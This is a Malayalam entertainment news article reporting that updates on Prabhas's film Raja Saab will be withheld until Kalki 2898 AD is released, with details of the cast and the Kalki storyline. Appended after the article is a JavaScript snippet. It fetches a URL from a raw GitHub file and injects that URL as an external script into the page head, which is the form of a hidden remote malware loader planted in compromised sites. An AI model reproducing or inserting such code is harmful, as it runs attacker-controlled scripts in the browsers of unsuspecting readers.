കൽക്കിക്കു വേണ്ടി രാജാ സാബിനെ ഒളിപ്പിക്കുന്നുവോ???

15

പ്രഭാസ് നായകനാകുന്ന രാജാ സാബിന്റെ ഫസ്റ്റ് ലുക്ക് ഫസ്റ്റ് ലുക്ക് പുറത്തുവന്ന നാളുകൾ ആയിട്ടും കുടുതൽ അപ്‍ഡേറ്റുകളൊന്നും പുറത്തുവിട്ടിട്ടില്ല. മാരുതി രചനയും സംവിധാനവും നിർവ്വഹിക്കുകയും പീപ്പിൾ മീഡിയ ഫാക്ടറിക്ക് കീഴിൽ ടി ജി വിശ്വ പ്രസാദും വിവേക് ​​കുച്ചിബോട്‌ലയും ചേർന്ന് നിർമ്മിക്കുകയും ചെയ്യുന്ന ഒരു വരാനിരിക്കുന്ന ഇന്ത്യൻ തെലുങ്ക് ഭാഷാ റൊമാൻ്റിക് ഹൊറർ ചിത്രമാണ് രാജാ സാബ് . നിധി അഗർവാൾ , റിദ്ധി കുമാർ , മാളവിക മോഹനൻ എന്നിവരും ചിത്രത്തിൽ പ്രധാനപ്പെട്ട വേഷങ്ങളിൽ എത്തുന്നു.പ്രേക്ഷകര്‍ ആകാംക്ഷയോടെ കാത്തിരിക്കുന്ന ഒരു ചിത്രവുമാണ് രാജാ സാബ്. എന്നാൽ ചിത്രത്തിന്റെ പുതിയ വിവരങ്ങൾ പുറത്തുവിടാത്തതിന്റെ കാരണം അണിയറ പ്രവർത്തകർ വ്യക്തമാക്കുന്നു. കൽക്കി 2898 എഡി റിലീസാകും വരെ ഇനി രാജാ സാബിന്റെ അപ്‍ഡേറ്റുകള്‍ പുറത്തുവിടില്ല.

പ്രഭാസിന്റെ തന്നെ പുതിയ ചിത്രമാണ് കൽക്കി 2898. ഇതിഹാസ കാവ്യമായ മഹാഭാരതമാന്ന് പ്രമേയം,കഥ അവസാനിക്കുന്നത് 2898 എഡിയിലുമായിരിക്കുമെന്നും .

സംവിധായകൻ നാഗ് അശ്വിൻ പ്രഭാസ് നായകനാകുന്ന ചിത്രത്തിന്റെ കഥ 6000 വര്‍ഷങ്ങളിലായി വ്യാപരിച്ച് നില്‍ക്കുന്നതായിരിക്കും എന്നു പറഞ്ഞു. കല്‍ക്കി 2989 എഡിക്ക് ഒമ്പത് ഭാഗങ്ങളുണ്ടാകും എന്ന് നടൻ അഭിനവ് ഒരു അഭിമുഖത്തില്‍ പറഞ്ഞതായി ട്രേഡ് അനലിസ്റ്റുകള്‍ റിപ്പോര്‍ട്ട് ചെയ്‍തിരുന്നു. ഏതായാലും കൽക്കി റിലീസ് ആകുന്നത് വരെ ഇനി രാജാ സാഹിബിന്റെ വിവരങ്ങൾ പ്രതീക്ഷിക്കേണ്ടതില്ല എന്നാണ് അറിയുന്നത്.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)